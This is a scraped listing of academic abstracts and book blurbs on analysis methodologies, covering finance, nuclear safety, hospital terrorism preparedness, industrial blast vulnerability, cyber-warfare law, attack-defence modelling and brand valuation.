    Full Text Available The article is devoted to the theoretical and methodological principles of strategic financial analysis of capital. The necessity of strategic financial analysis of capital as a methodological basis for study strategies is proved in modern conditions of a high level of dynamism, uncertainty and risk. The methodological elements of the strategic financial analysis of capital (the object of investigation, the indicators, the factors, the methods of study, the subjects of analysis, the sources of incoming and outgoing information are justified in the system of financial management, allowing to improve its theoretical foundations. It is proved that the strategic financial analysis of capital is a continuous process, carried out in an appropriate sequence at each stage of capital circulation. The system of indexes is substantiated, based on the needs of the strategic financial analysis. The classification of factors determining the size and structure of company’s capital is grounded. The economic nature of capital of the company is clarified. We consider that capital is a stock of economic resources in the form of cash, tangible and intangible assets accumulated by savings, which is used by its owner as a factor of production and investment resource in the economic process in order to obtain profit, to ensure the growth of owners’ prosperity and to achieve social effect.

  20. Chemical or Biological Terrorist Attacks: An Analysis of the Preparedness of Hospitals for Managing Victims Affected by Chemical or Biological Weapons of Mass Destruction

    Science.gov (United States)

    Bennett, Russell L.

    2006-01-01

    The possibility of a terrorist attack employing the use of chemical or biological weapons of mass destruction (WMD) on American soil is no longer an empty threat, it has become a reality. A WMD is defined as any weapon with the capacity to inflict death and destruction on such a massive scale that its very presence in the hands of hostile forces is a grievous threat. Events of the past few years including the bombing of the World Trade Center in 1993, the Murrah Federal Building in Oklahoma City in 1995 and the use of planes as guided missiles directed into the Pentagon and New York’s Twin Towers in 2001 (9/11) and the tragic incidents involving twenty-three people who were infected and five who died as a result of contact with anthrax-laced mail in the Fall of 2001, have well established that the United States can be attacked by both domestic and international terrorists without warning or provocation. In light of these actions, hospitals have been working vigorously to ensure that they would be “ready” in the event of another terrorist attack to provide appropriate medical care to victims. However, according to a recent United States General Accounting Office (GAO) nationwide survey, our nation’s hospitals still are not prepared to manage mass causalities resulting from chemical or biological WMD. Therefore, there is a clear need for information about current hospital preparedness in order to provide a foundation for systematic planning and broader discussions about relative cost, probable effectiveness, environmental impact and overall societal priorities. Hence, the aim of this research was to examine the current preparedness of hospitals in the State of Mississippi to manage victims of terrorist attacks involving chemical or biological WMD. All acute care hospitals in the State were selected for inclusion in this study. Both quantitative and qualitative methods were utilized for data collection and analysis. Six hypotheses were tested. Using a

  1. An efficient methodology for the analysis of primary frequency control of electric power systems

    Energy Technology Data Exchange (ETDEWEB)

    Popovic, D.P. [Nikola Tesla Institute, Belgrade (Yugoslavia); Mijailovic, S.V. [Electricity Coordinating Center, Belgrade (Yugoslavia)

    2000-06-01

    The paper presents an efficient methodology for the analysis of primary frequency control of electric power systems. This methodology continuously monitors the electromechanical transient processes with durations that last up to 30 s, occurring after the characteristic disturbances. It covers the period of short-term dynamic processes, appearing immediately after the disturbance, in which the dynamics of the individual synchronous machines is dominant, as well as the period with the uniform movement of all generators and restoration of their voltages. The characteristics of the developed methodology were determined based on the example of real electric power interconnection formed by the electric power systems of Yugoslavia, a part of Republic of Srpska, Romania, Bulgaria, former Yugoslav Republic of Macedonia, Greece and Albania (the second UCPTE synchronous zone). (author)

  2. Vulnerability of industrial facilities to attacks with improvised explosive devices aimed at triggering domino scenarios

    International Nuclear Information System (INIS)

    Landucci, Gabriele; Reniers, Genserik; Cozzani, Valerio; Salzano, Ernesto

    2015-01-01

    Process- and chemical plants may constitute a critical target for a terrorist attack. In the present study, the analysis of industrial accidents induced by intentional acts of interference is carried out focusing on accident chains triggered by attacks with home-made (improvised) explosives. The effects of blast waves caused by improvised explosive devices are compared with those expected from a net equivalent charge of TNT by using a specific methodology for the assessment of stand-off distances. It is demonstrated that a home-made explosive device has a TNT efficiency comprised between 0.2 and 0.5. The model was applied to a case study, demonstrating the potentiality of improvised explosives in causing accident escalation sequences and severe effects on population and assets. The analysis of the case-study also allowed obtaining suggestions for an adequate security management. - Highlights: • Improvised explosives possibly used for terrorist attacks were described. • The TNT efficiency of ANFO and TATP was characterized. • Domino effects caused by an attack with improvised explosive were analyzed. • Domino scenarios induced by an attack were compared to conventional scenarios

  3. Methodology for Risk Analysis of Dam Gates and Associated Operating Equipment Using Fault Tree Analysis

    National Research Council Canada - National Science Library

    Patev, Robert C; Putcha, Chandra; Foltz, Stuart D

    2005-01-01

    .... This report summarizes research on methodologies to assist in quantifying risks related to dam gates and associated operating equipment, and how those risks relate to overall spillway failure risk...

  4. Best-estimate methodology for analysis of anticipated transients without scram in pressurized water reactors

    International Nuclear Information System (INIS)

    Rebollo, L.

    1993-01-01

    Union Fenosa, a utility company in Spain, has performed research on pressurized water reactor (PWR) safety with respect to the development of a best-estimate methodology for the analysis of anticipated transients without scram (ATWS), i.e., those anticipated transients for which failure of the reactor protection system is postulated. A scientific and technical approach is adopted with respect to the ATWS phenomenon as it affects a PWR, specifically the Zorita nuclear power plant, a single-loop Westinghouse-designed PWR in Spain. In this respect, an ATWS sequence analysis methodology based on published codes that is generically applicable to any PWR is proposed, which covers all the anticipated phenomena and defines the applicable acceptance criteria. The areas contemplated are cell neutron analysis, core thermal hydraulics, and plant dynamics, which are developed, qualified, and plant dynamics, which are developed, qualified, and validated by comparison with reference calculations and measurements obtained from integral or separate-effects tests

  5. Methodology for the analysis of dietary data from the Mexican National Health and Nutrition Survey 2006.

    Science.gov (United States)

    Rodríguez-Ramírez, Sonia; Mundo-Rosas, Verónica; Jiménez-Aguilar, Alejandra; Shamah-Levy, Teresa

    2009-01-01

    To describe the methodology for the analysis of dietary data from the Mexican National Health and Nutrition Survey 2006 (ENSANUT 2006) carried out in Mexico. Dietary data from the population who participated in the ENSANUT 2006 were collected through a 7-day food-frequency questionnaire. Energy and nutrient intake of each food consumed and adequacy percentage by day were also estimated. Intakes and adequacy percentages > 5 SDs from the energy and nutrient general distribution and observations with energy adequacy percentages < 25% were excluded from the analysis. Valid dietary data were obtained from 3552 children aged 1 to 4 years, 8716 children aged 5 to 11 years, 8442 adolescents, 15951 adults, and 3357 older adults. It is important to detail the methodology for the analysis of dietary data to standardize data cleaning criteria and to be able to compare the results of different studies.

  6. Analysis methodology for the post-trip return to power steam line break event

    Energy Technology Data Exchange (ETDEWEB)

    Lee, Chul Shin; Kim, Chul Woo; You, Hyung Keun [Korea Atomic Energy Research Institute, Taejon (Korea, Republic of)

    1996-06-01

    An analysis for Steam Line Break (SLB) events which result in a Return-to-Power (RTP) condition after reactor trip was performed for a postulated Yonggwang Nuclear Power Plant Unit 3 cycle 8. Analysis methodology for post-trip RTP SLB is quite different from that of non-RTP SLB and is more difficult. Therefore, it is necessary to develop a methodology to analyze the response of the NSSS parameters to the post-trip RTP SLB events and the fuel performance after the total reactivity exceeds the criticality. In this analysis, the cases with and without offsite power were simulated crediting 3-D reactivity feedback effect due to a local heatup in the vicinity of stuck CEA and compared with the cases without 3-D reactivity feedback with respect to post-trip fuel performance. Departure-to Nucleate Boiling Ratio (DNBR) and Linear Heat Generation Rate (LHGR). 36 tabs., 32 figs., 11 refs. (Author) .new.

  7. Accidental safety analysis methodology development in decommission of the nuclear facility

    Energy Technology Data Exchange (ETDEWEB)

    Park, G. H.; Hwang, J. H.; Jae, M. S.; Seong, J. H.; Shin, S. H.; Cheong, S. J.; Pae, J. H.; Ang, G. R.; Lee, J. U. [Seoul National Univ., Seoul (Korea, Republic of)

    2002-03-15

    Decontamination and Decommissioning (D and D) of a nuclear reactor cost about 20% of construction expense and production of nuclear wastes during decommissioning makes environmental issues. Decommissioning of a nuclear reactor in Korea is in a just beginning stage, lacking clear standards and regulations for decommissioning. This work accident safety analysis in decommissioning of the nuclear facility can be a solid ground for the standards and regulations. For source term analysis for Kori-1 reactor vessel, MCNP/ORIGEN calculation methodology was applied. The activity of each important nuclide in the vessel was estimated at a time after 2008, the year Kori-1 plant is supposed to be decommissioned. And a methodology for risk analysis assessment in decommissioning was developed.

  8. More Than Just a Discursive Practice? Conceptual Principles and Methodological Aspects of Dispositif Analysis

    Directory of Open Access Journals (Sweden)

    Andrea D. Bührmann

    2007-05-01

    Full Text Available This article gives an introduction into the conceptual and practical field of dispositf analysis—a field that is of great importance but that is as yet underdeveloped. In order to render this introduction, we first explain the terms discourse and dispositif. Then we examine the conceptual instruments and methodological procedures of dispositf analysis. In this way, we define the relations between discourse and (a non discoursive practices (b subjectification, (c everyday orders of knowledge and (d institutional practices like societal changes as central issues of dispositif analysis. Furthermore, we point out the methodological possibilities and limitations of dispositif analysis. We demonstrate these possibilities and limitations with some practical examples. In general, this article aims to provide an extension of the perspectives of discourse theory and research by stressing the relations between normative orders of knowledge, their effects on interactions and individual self–reflections connected with them. URN: urn:nbn:de:0114-fqs0702281

  9. Cyber Attacks, Information Attacks, and Postmodern Warfare

    Directory of Open Access Journals (Sweden)

    Valuch Jozef

    2017-06-01

    Full Text Available The aim of this paper is to evaluate and differentiate between the phenomena of cyberwarfare and information warfare, as manifestations of what we perceive as postmodern warfare. We describe and analyse the current examples of the use the postmodern warfare and the reactions of states and international bodies to these phenomena. The subject matter of this paper is the relationship between new types of postmodern conflicts and the law of armed conflicts (law of war. Based on ICJ case law, it is clear that under current legal rules of international law of war, cyber attacks as well as information attacks (often performed in the cyberspace as well can only be perceived as “war” if executed in addition to classical kinetic warfare, which is often not the case. In most cases perceived “only” as a non-linear warfare (postmodern conflict, this practice nevertheless must be condemned as conduct contrary to the principles of international law and (possibly a crime under national laws, unless this type of conduct will be recognized by the international community as a “war” proper, in its new, postmodern sense.

  10. THEORETICAL AND METHODOLOGICAL PRINCIPLES OF THE STRATEGIC FINANCIAL ANALYSIS OF CAPITAL

    Directory of Open Access Journals (Sweden)

    Olha KHUDYK

    2016-07-01

    Full Text Available The article is devoted to the theoretical and methodological principles of strategic financial analysis of capital. The necessity of strategic financial analysis of capital as a methodological basis for study strategies is proved in modern conditions of a high level of dynamism, uncertainty and risk. The methodological elements of the strategic indicators, the factors, the methods of study, the subjects of analysis, the sources of incoming and outgoing information are justified in the system of financial management, allowing to improve its theoretical foundations. It is proved that the strategic financial analysis of capital is a continuous process, carried out in an appropriate sequence at each stage of capital circulation. The system of indexes is substantiated, based on the needs of the strategic financial analysis. The classification of factors determining the size and structure of company’s capital is grounded. The economic nature of capital of the company is clarified. We consider that capital is a stock of economic resources in the form of cash, tangible and intangible assets accumulated by savings, which is used by its owner as a factor of production and investment resource in the economic process in order to obtain profit, to ensure the growth of owners’ prosperity and to achieve social effect.

  11. A Methodology for the Development of RESTful Semantic Web Services for Gene Expression Analysis.

    Science.gov (United States)

    Guardia, Gabriela D A; Pires, Luís Ferreira; Vêncio, Ricardo Z N; Malmegrim, Kelen C R; de Farias, Cléver R G

    2015-01-01

    Gene expression studies are generally performed through multi-step analysis processes, which require the integrated use of a number of analysis tools. In order to facilitate tool/data integration, an increasing number of analysis tools have been developed as or adapted to semantic web services. In recent years, some approaches have been defined for the development and semantic annotation of web services created from legacy software tools, but these approaches still present many limitations. In addition, to the best of our knowledge, no suitable approach has been defined for the functional genomics domain. Therefore, this paper aims at defining an integrated methodology for the implementation of RESTful semantic web services created from gene expression analysis tools and the semantic annotation of such services. We have applied our methodology to the development of a number of services to support the analysis of different types of gene expression data, including microarray and RNASeq. All developed services are publicly available in the Gene Expression Analysis Services (GEAS) Repository at http://dcm.ffclrp.usp.br/lssb/geas. Additionally, we have used a number of the developed services to create different integrated analysis scenarios to reproduce parts of two gene expression studies documented in the literature. The first study involves the analysis of one-color microarray data obtained from multiple sclerosis patients and healthy donors. The second study comprises the analysis of RNA-Seq data obtained from melanoma cells to investigate the role of the remodeller BRG1 in the proliferation and morphology of these cells. Our methodology provides concrete guidelines and technical details in order to facilitate the systematic development of semantic web services. Moreover, it encourages the development and reuse of these services for the creation of semantically integrated solutions for gene expression analysis.

  12. A Methodology for the Development of RESTful Semantic Web Services for Gene Expression Analysis.

    Directory of Open Access Journals (Sweden)

    Gabriela D A Guardia

    Full Text Available Gene expression studies are generally performed through multi-step analysis processes, which require the integrated use of a number of analysis tools. In order to facilitate tool/data integration, an increasing number of analysis tools have been developed as or adapted to semantic web services. In recent years, some approaches have been defined for the development and semantic annotation of web services created from legacy software tools, but these approaches still present many limitations. In addition, to the best of our knowledge, no suitable approach has been defined for the functional genomics domain. Therefore, this paper aims at defining an integrated methodology for the implementation of RESTful semantic web services created from gene expression analysis tools and the semantic annotation of such services. We have applied our methodology to the development of a number of services to support the analysis of different types of gene expression data, including microarray and RNASeq. All developed services are publicly available in the Gene Expression Analysis Services (GEAS Repository at http://dcm.ffclrp.usp.br/lssb/geas. Additionally, we have used a number of the developed services to create different integrated analysis scenarios to reproduce parts of two gene expression studies documented in the literature. The first study involves the analysis of one-color microarray data obtained from multiple sclerosis patients and healthy donors. The second study comprises the analysis of RNA-Seq data obtained from melanoma cells to investigate the role of the remodeller BRG1 in the proliferation and morphology of these cells. Our methodology provides concrete guidelines and technical details in order to facilitate the systematic development of semantic web services. Moreover, it encourages the development and reuse of these services for the creation of semantically integrated solutions for gene expression analysis.

  13. Seven Deadliest Wireless Technologies Attacks

    CERN Document Server

    Haines, Brad

    2010-01-01

    How can an information security professional keep up with all of the hacks, attacks, and exploits? One way to find out what the worst of the worst are is to read the seven books in our Seven Deadliest Attacks Series. Not only do we let you in on the anatomy of these attacks but we also tell you how to get rid of them and how to defend against them in the future. Countermeasures are detailed so that you can fight against similar attacks as they evolve. Attacks featured in this book include:Bluetooth AttacksCredit Card, Access Card, and Passport AttacksBad Encryption

  14. Summary of the Supplemental Model Reports Supporting the Disposal Criticality Analysis Methodology Topical Report

    International Nuclear Information System (INIS)

    Brownson, D. A.

    2002-01-01

    The Department of Energy (DOE) Office of Civilian Radioactive Waste Management (OCRWM) has committed to a series of model reports documenting the methodology to be utilized in the Disposal Criticality Analysis Methodology Topical Report (YMP 2000). These model reports detail and provide validation of the methodology to be utilized for criticality analyses related to: (1) Waste form/waste package degradation; (2) Waste package isotopic inventory; (3) Criticality potential of degraded waste form/waste package configurations (effective neutron multiplication factor); (4) Probability of criticality (for each potential critical configuration as well as total event); and (5) Criticality consequences. This purpose of this summary report is to provide a status of the model reports and a schedule for their completion. This report also provides information relative to the model report content and validation. The model reports and their revisions are being generated as a result of: (1) Commitments made in the Disposal Criticality Analysis Methodology Topical Report (YMP 2000); (2) Open Items from the Safety Evaluation Report (Reamer 2000); (3) Key Technical Issue agreements made during DOE/U.S. Nuclear Regulatory Commission (NRC) Technical Exchange Meeting (Reamer and Williams 2000); and (4) NRC requests for additional information (Schlueter 2002)

  15. Application of NASA Kennedy Space Center system assurance analysis methodology to nuclear power plant systems designs

    International Nuclear Information System (INIS)

    Page, D.W.

    1985-01-01

    The Kennedy Space Center (KSC) entered into an agreement with the Nuclear Regulatory Commission (NRC) to conduct a study to demonstrate the feasibility and practicality of applying the KSC System Assurance Analysis (SAA) methodology to nuclear power plant systems designs. In joint meetings of KSC and Duke Power personnel, an agreement was made to select to CATAWBA systems, the Containment Spray System and the Residual Heat Removal System, for the analyses. Duke Power provided KSC with a full set a Final Safety Analysis Reports as well as schematics for the two systems. During Phase I of the study the reliability analyses of the SAA were performed. During Phase II the hazard analyses were performed. The final product of Phase II is a handbook for implementing the SAA methodology into nuclear power plant systems designs. The purpose of this paper is to describe the SAA methodology as it applies to nuclear power plant systems designs and to discuss the feasibility of its application. The conclusion is drawn that nuclear power plant systems and aerospace ground support systems are similar in complexity and design and share common safety and reliability goals. The SAA methodology is readily adaptable to nuclear power plant designs because of it's practical application of existing and well known safety and reliability analytical techniques tied to an effective management information system

  16. Data development technical support document for the aircraft crash risk analysis methodology (ACRAM) standard

    International Nuclear Information System (INIS)

    Kimura, C.Y.; Glaser, R.E.; Mensing, R.W.; Lin, T.; Haley, T.A.; Barto, A.B.; Stutzke, M.A.

    1996-01-01

    The Aircraft Crash Risk Analysis Methodology (ACRAM) Panel has been formed by the US Department of Energy Office of Defense Programs (DOE/DP) for the purpose of developing a standard methodology for determining the risk from aircraft crashes onto DOE ground facilities. In order to accomplish this goal, the ACRAM panel has been divided into four teams, the data development team, the model evaluation team, the structural analysis team, and the consequence team. Each team, consisting of at least one member of the ACRAM plus additional DOE and DOE contractor personnel, specializes in the development of the methodology assigned to that team. This report documents the work performed by the data development team and provides the technical basis for the data used by the ACRAM Standard for determining the aircraft crash frequency. This report should be used to provide the generic data needed to calculate the aircraft crash frequency into the facility under consideration as part of the process for determining the aircraft crash risk to ground facilities as given by the DOE Standard Aircraft Crash Risk Assessment Methodology (ACRAM). Some broad guidance is presented on how to obtain the needed site-specific and facility specific data but this data is not provided by this document

  17. A quantitative flood risk analysis methodology for urban areas with integration of social research data

    Directory of Open Access Journals (Sweden)

    I. Escuder-Bueno

    2012-09-01

    Full Text Available Risk analysis has become a top priority for authorities and stakeholders in many European countries, with the aim of reducing flooding risk, considering the population's needs and improving risk awareness. Within this context, two methodological pieces have been developed in the period 2009–2011 within the SUFRI project (Sustainable Strategies of Urban Flood Risk Management with non-structural measures to cope with the residual risk, 2nd ERA-Net CRUE Funding Initiative. First, the "SUFRI Methodology for pluvial and river flooding risk assessment in urban areas to inform decision-making" provides a comprehensive and quantitative tool for flood risk analysis. Second, the "Methodology for investigation of risk awareness of the population concerned" presents the basis to estimate current risk from a social perspective and identify tendencies in the way floods are understood by citizens. Outcomes of both methods are integrated in this paper with the aim of informing decision making on non-structural protection measures. The results of two case studies are shown to illustrate practical applications of this developed approach. The main advantage of applying the methodology herein presented consists in providing a quantitative estimation of flooding risk before and after investing in non-structural risk mitigation measures. It can be of great interest for decision makers as it provides rational and solid information.

  18. A quantitative flood risk analysis methodology for urban areas with integration of social research data

    Science.gov (United States)

    Escuder-Bueno, I.; Castillo-Rodríguez, J. T.; Zechner, S.; Jöbstl, C.; Perales-Momparler, S.; Petaccia, G.

    2012-09-01

    Risk analysis has become a top priority for authorities and stakeholders in many European countries, with the aim of reducing flooding risk, considering the population's needs and improving risk awareness. Within this context, two methodological pieces have been developed in the period 2009-2011 within the SUFRI project (Sustainable Strategies of Urban Flood Risk Management with non-structural measures to cope with the residual risk, 2nd ERA-Net CRUE Funding Initiative). First, the "SUFRI Methodology for pluvial and river flooding risk assessment in urban areas to inform decision-making" provides a comprehensive and quantitative tool for flood risk analysis. Second, the "Methodology for investigation of risk awareness of the population concerned" presents the basis to estimate current risk from a social perspective and identify tendencies in the way floods are understood by citizens. Outcomes of both methods are integrated in this paper with the aim of informing decision making on non-structural protection measures. The results of two case studies are shown to illustrate practical applications of this developed approach. The main advantage of applying the methodology herein presented consists in providing a quantitative estimation of flooding risk before and after investing in non-structural risk mitigation measures. It can be of great interest for decision makers as it provides rational and solid information.

  19. A fatal elephant attack.

    Science.gov (United States)

    Hejna, Petr; Zátopková, Lenka; Safr, Miroslav

    2012-01-01

    A rare case of an elephant attack is presented. A 44-year-old man working as an elephant keeper was attacked by a cow elephant when he tripped over a foot chain while the animal was being medically treated. The man fell down and was consequently repeatedly attacked with elephant tusks. The man sustained multiple stab injuries to both groin regions, a penetrating injury to the abdominal wall with traumatic prolapse of the loops of the small bowel, multiple defects of the mesentery, and incomplete laceration of the abdominal aorta with massive bleeding into the abdominal cavity. In addition to the penetrating injuries, the man sustained multiple rib fractures with contusion of both lungs and laceration of the right lobe of the liver, and comminuted fractures of the pelvic arch and left femoral body. The man died shortly after he had been received at the hospital. The cause of death was attributed to traumatic shock. © 2011 American Academy of Forensic Sciences.

  20. Reporting and methodological quality of survival analysis in articles published in Chinese oncology journals.

    Science.gov (United States)

    Zhu, Xiaoyan; Zhou, Xiaobin; Zhang, Yuan; Sun, Xiao; Liu, Haihua; Zhang, Yingying

    2017-12-01

    Survival analysis methods have gained widespread use in the filed of oncology. For achievement of reliable results, the methodological process and report quality is crucial. This review provides the first examination of methodological characteristics and reporting quality of survival analysis in articles published in leading Chinese oncology journals.To examine methodological and reporting quality of survival analysis, to identify some common deficiencies, to desirable precautions in the analysis, and relate advice for authors, readers, and editors.A total of 242 survival analysis articles were included to be evaluated from 1492 articles published in 4 leading Chinese oncology journals in 2013. Articles were evaluated according to 16 established items for proper use and reporting of survival analysis.The application rates of Kaplan-Meier, life table, log-rank test, Breslow test, and Cox proportional hazards model (Cox model) were 91.74%, 3.72%, 78.51%, 0.41%, and 46.28%, respectively, no article used the parametric method for survival analysis. Multivariate Cox model was conducted in 112 articles (46.28%). Follow-up rates were mentioned in 155 articles (64.05%), of which 4 articles were under 80% and the lowest was 75.25%, 55 articles were100%. The report rates of all types of survival endpoint were lower than 10%. Eleven of 100 articles which reported a loss to follow-up had stated how to treat it in the analysis. One hundred thirty articles (53.72%) did not perform multivariate analysis. One hundred thirty-nine articles (57.44%) did not define the survival time. Violations and omissions of methodological guidelines included no mention of pertinent checks for proportional hazard assumption; no report of testing for interactions and collinearity between independent variables; no report of calculation method of sample size. Thirty-six articles (32.74%) reported the methods of independent variable selection. The above defects could make potentially inaccurate

  1. Methodological Choices in Muscle Synergy Analysis Impact Differentiation of Physiological Characteristics Following Stroke

    Directory of Open Access Journals (Sweden)

    Caitlin L. Banks

    2017-08-01

    Full Text Available Muscle synergy analysis (MSA is a mathematical technique that reduces the dimensionality of electromyographic (EMG data. Used increasingly in biomechanics research, MSA requires methodological choices at each stage of the analysis. Differences in methodological steps affect the overall outcome, making it difficult to compare results across studies. We applied MSA to EMG data collected from individuals post-stroke identified as either responders (RES or non-responders (nRES on the basis of a critical post-treatment increase in walking speed. Importantly, no clinical or functional indicators identified differences between the cohort of RES and nRES at baseline. For this exploratory study, we selected the five highest RES and five lowest nRES available from a larger sample. Our goal was to assess how the methodological choices made before, during, and after MSA affect the ability to differentiate two groups with intrinsic physiologic differences based on MSA results. We investigated 30 variations in MSA methodology to determine which choices allowed differentiation of RES from nRES at baseline. Trial-to-trial variability in time-independent synergy vectors (SVs and time-varying neural commands (NCs were measured as a function of: (1 number of synergies computed; (2 EMG normalization method before MSA; (3 whether SVs were held constant across trials or allowed to vary during MSA; and (4 synergy analysis output normalization method after MSA. MSA methodology had a strong effect on our ability to differentiate RES from nRES at baseline. Across all 10 individuals and MSA variations, two synergies were needed to reach an average of 90% variance accounted for (VAF. Based on effect sizes, differences in SV and NC variability between groups were greatest using two synergies with SVs that varied from trial-to-trial. Differences in SV variability were clearest using unit magnitude per trial EMG normalization, while NC variability was less sensitive to EMG

  2. Business analysis methodology in telecommunication industry – the research based on the grounded theory

    Directory of Open Access Journals (Sweden)

    Hana Nenickova

    2013-10-01

    Full Text Available The objective of this article is to present the grounded theory using in the qualitative research as a basis to build a business analysis methodology for the implementation of information systems in telecommunication enterprises in Czech Republic. In the preparation of the methodology I have used the current needs of telecommunications companies, which are characterized mainly by high dependence on information systems. Besides that, this industry is characterized by high flexibility and competition and compressing of the corporate strategy timeline. The grounded theory of business analysis defines the specifics of the telecommunications industry, focusing on the very specific description of the procedure for collecting the business requirements and following the business strategy.

  3. Application of GO methodology in reliability analysis of offsite power supply of Daya Bay NPP

    International Nuclear Information System (INIS)

    Shen Zupei; Li Xiaodong; Huang Xiangrui

    2003-01-01

    The author applies the GO methodology to reliability analysis of the offsite power supply system of Daya Bay NPP. The direct quantitative calculation formulas of the stable reliability target of the system with shared signals and the dynamic calculation formulas of the state probability for the unit with two states are derived. The method to solve the fault event sets of the system is also presented and all the fault event sets of the outer power supply system and their failure probability are obtained. The resumption reliability of the offsite power supply system after the stability failure of the power net is also calculated. The result shows that the GO methodology is very simple and useful in the stable and dynamic reliability analysis of the repairable system

  4. Methodology of a PWR containment analysis during a thermal-hydraulic accident

    Energy Technology Data Exchange (ETDEWEB)

    Silva, Dayane F.; Sabundjian, Gaiane; Lima, Ana Cecilia S., E-mail: dayane.silva@usp.br, E-mail: gdjian@ipen.br, E-mail: aclima@ipen.br [Instituto de Pesquisas Energeticas e Nucleares (IPEN/CNEN-SP), Sao Paulo, SP (Brazil)

    2015-07-01

    The aim of this work is to present the methodology of calculation to Angra 2 reactor containment during accidents of the type Loss of Coolant Accident (LOCA). This study will be possible to ensure the safety of the population of the surroundings upon the occurrence of accidents. One of the programs used to analyze containment of a nuclear plant is the CONTAIN. This computer code is an analysis tool used for predicting the physical conditions and distributions of radionuclides inside a containment building following the release of material from the primary system in a light-water reactor during an accident. The containment of the type PWR plant is a concrete building covered internally by metallic material and has limits of design pressure. The methodology of containment analysis must estimate the limits of pressure during a LOCA. The boundary conditions for the simulation are obtained from RELAP5 code. (author)

  5. Methodology of a PWR containment analysis during a thermal-hydraulic accident

    International Nuclear Information System (INIS)

    Silva, Dayane F.; Sabundjian, Gaiane; Lima, Ana Cecilia S.

    2015-01-01

    The aim of this work is to present the methodology of calculation to Angra 2 reactor containment during accidents of the type Loss of Coolant Accident (LOCA). This study will be possible to ensure the safety of the population of the surroundings upon the occurrence of accidents. One of the programs used to analyze containment of a nuclear plant is the CONTAIN. This computer code is an analysis tool used for predicting the physical conditions and distributions of radionuclides inside a containment building following the release of material from the primary system in a light-water reactor during an accident. The containment of the type PWR plant is a concrete building covered internally by metallic material and has limits of design pressure. The methodology of containment analysis must estimate the limits of pressure during a LOCA. The boundary conditions for the simulation are obtained from RELAP5 code. (author)

  6. Effects of methodology and analysis strategy on robustness of pestivirus phylogeny.

    Science.gov (United States)

    Liu, Lihong; Xia, Hongyan; Baule, Claudia; Belák, Sándor; Wahlberg, Niklas

    2010-01-01

    Phylogenetic analysis of pestiviruses is a useful tool for classifying novel pestiviruses and for revealing their phylogenetic relationships. In this study, robustness of pestivirus phylogenies has been compared by analyses of the 5'UTR, and complete N(pro) and E2 gene regions separately and combined, performed by four methods: neighbour-joining (NJ), maximum parsimony (MP), maximum likelihood (ML), and Bayesian inference (BI). The strategy of analysing the combined sequence dataset by BI, ML, and MP methods resulted in a single, well-supported tree topology, indicating a reliable and robust pestivirus phylogeny. By contrast, the single-gene analysis strategy resulted in 12 trees of different topologies, revealing different relationships among pestiviruses. These results indicate that the strategies and methodologies are two vital aspects affecting the robustness of the pestivirus phylogeny. The strategy and methodologies outlined in this paper may have a broader application in inferring phylogeny of other RNA viruses.

  7. Unified communications forensics anatomy of common UC attacks

    CERN Document Server

    Grant, Nicholas Mr

    2013-01-01

    Unified Communications Forensics: Anatomy of Common UC Attacks is the first book to explain the issues and vulnerabilities and demonstrate the attacks, forensic artifacts, and countermeasures required to establish a secure (UC) environment. This book is written by leading UC experts Nicholas Grant and Joseph W. Shaw II and provides material never before found on the market, including: analysis of forensic artifacts in common UC attacks an in-depth look at established UC technologies and attack exploits hands-on understanding of UC attack vectors and associated countermeasures

  8. Quantitative Verification and Synthesis of Attack-Defence Scenarios

    DEFF Research Database (Denmark)

    Aslanyan, Zaruhi; Nielson, Flemming; Parker, David

    2016-01-01

    analysis of quantitative properties of complex attack-defence scenarios, using an extension of attack-defence trees which models temporal ordering of actions and allows explicit dependencies in the strategies adopted by attackers and defenders. We adopt a game-theoretic approach, translating attack...... which guarantee or optimise some quantitative property, such as the probability of a successful attack, the expected cost incurred, or some multi-objective trade-off between the two. We implement our approach, building upon the PRISM-games model checker, and apply it to a case study of an RFID goods...

  9. Analysis of Interbrand, BrandZ and BAV brand valuation methodologies

    Directory of Open Access Journals (Sweden)

    Krstić Bojan

    2011-01-01

    Full Text Available Brand valuation is considered for one of the most significant challenges of not only theory and practice of contemporary marketing, but other disciplines, as well. Namely, the complex nature of this issue implies the need for multidisciplinary approach and creation of methodology which goes beyond the borders of marketing as a discipline, and includes knowledge derived from accounting, finance and other areas. However, mostly one-sided approaches oriented towards determining brand value either based on research results of consumer behavior and attitudes or based on financial success of the brand are dominant in marketing and financial literature. Simultaneously with these theoretical methodologies, agencies for consultancy and marketing and other subjects have been developing their own brand valuation methods and models. Some of them can be appointed to comprehensive approach to brand valuation, which overcomes mentioned problem considering one-sided analysis of brand value. The comprehensive approach, namely, presumes brand valuation based on benefits which brand provides to both customers and enterprise that owns it, in other words - based on qualitative and quantitative measures respectively reflecting behavior and attitudes of consumers and assumed financial value of the brand, or, more precisely, brand value capitalization. According to the defined research subject, this paper is structured as follows: importance and problem of brand value are reviewed in the Introduction, and three most well-known brand valuation methodologies developed by consultancy agencies - Interbrand methodology and BrandZ and BAV models are analyzed in the next section. In the further considerations the results of comparative analysis of these methodologies are presented and implications for adequate brand valuation suggested.

  10. Methodology of demand forecast by market analysis of electric power and load curves

    International Nuclear Information System (INIS)

    Barreiro, C.J.; Atmann, J.L.

    1989-01-01

    A methodology for demand forecast of consumer classes and their aggregation is presented. An analysis of the actual attended market can be done by appropriate measures and load curves studies. The suppositions for the future market behaviour by consumer classes (industrial, residential, commercial, others) are shown, and the actions for optimise this market are foreseen, obtained by load curves modulations. The process of future demand determination is obtained by the appropriate aggregation of this segmented demands. (C.G.C.)

  11. Comparing Internet Probing Methodologies Through an Analysis of Large Dynamic Graphs

    Science.gov (United States)

    2014-06-01

    System Number CAIDA Cooperative Association of Internet Data Analysis GB gigabyte IETF IPv4 IP IPv6 ISP NPS NTC RFC RTT TTL ICMP NPS ESD VSD TCP UDP DoS...including, DIMES, IPlane, Ark IPv4 All Prefix /24 and recently NPS probing methodol- ogy. NPS probing methodology is different from the others because it...trace, a history of the forward interface-level path and time to send and acknowledge are available to analyze. However, traceroute may not return

  12. Methodological Approach to Company Cash Flows Target-Oriented Forecasting Based on Financial Position Analysis

    OpenAIRE

    Sergey Krylov

    2012-01-01

    The article treats a new methodological approach to the company cash flows target-oriented forecasting based on its financial position analysis. The approach is featured to be universal and presumes application of the following techniques developed by the author: financial ratio values correction techniques and correcting cash flows techniques. The financial ratio values correction technique assumes to analyze and forecast company financial position while the correcting cash flows technique i...

  13. Methodological and theoretical issues in the comparative analysis of gender relations in Western Europe

    OpenAIRE

    S Walby

    1994-01-01

